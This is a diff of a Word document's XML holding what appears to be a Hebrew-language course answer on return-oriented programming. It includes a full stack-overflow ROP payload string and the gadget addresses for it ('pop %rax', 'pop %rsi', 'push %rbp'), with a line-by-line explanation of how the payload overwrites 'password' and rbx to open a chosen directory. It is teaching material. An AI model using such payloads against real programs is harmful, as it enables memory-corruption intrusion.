+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\xf5\x08\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\xa1\x1d\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x01\x00\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x71\x0e\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x53\x00\x00\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x78\x11\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>aaaaaaaaaaamy_first_rop\x00\x71\x0e\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\x1e\x0e\x40\x00\x00\x00\x00\x00\x71\x0e\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\x1e\x0e\x40\x00\x00\x00\x00\x00\x6d\x1b\x40\x00\x00\x00\x00\x00\xe3\xff\xff\xff\xff\xff\xff\xff\xf5\x08\x40\x00\x00\x00\x00\x00\xa1\x1d\x40\x00\x00\x00\x00\x00\xed\x01\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x71\x0e\x40\x00\x00\x00\x00\x00\x53\x00\x00\x00\x00\x00\x00\x00\x78\x11\x40\x00\x00\x00\x00\x00</w:t>
-      </w:r>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>נסביר עבור כל שורה מה מטרתה ביצירת הפלט:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">שורה זו מכילה 24 בתים שימלאו את </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> וידרסו את הערך של </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rbx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. 13 הבתים האחרונים הם </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>null-terminated string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שיכיל את הכתובת לתיקייה שנרצה לפתוח (11 הבתים הראשונים הם שרירותיים ולא משנים לנו).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">שורה זו מכילה את הכתובת של הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">מסעיף 3 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>שנרצה להגיע אליה אחרי שנצא מ-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>main</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">שורה זו מכילה את הכתובת של הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מסעיף 3 שנרצה ש-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> יכיל.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">שורה זו מכילה את הכתובת של הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“push %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rbp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מסעיף 3 שנרצה להגיע אליה מ-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ret</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">שורה זו תכיל את הכתובת של הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
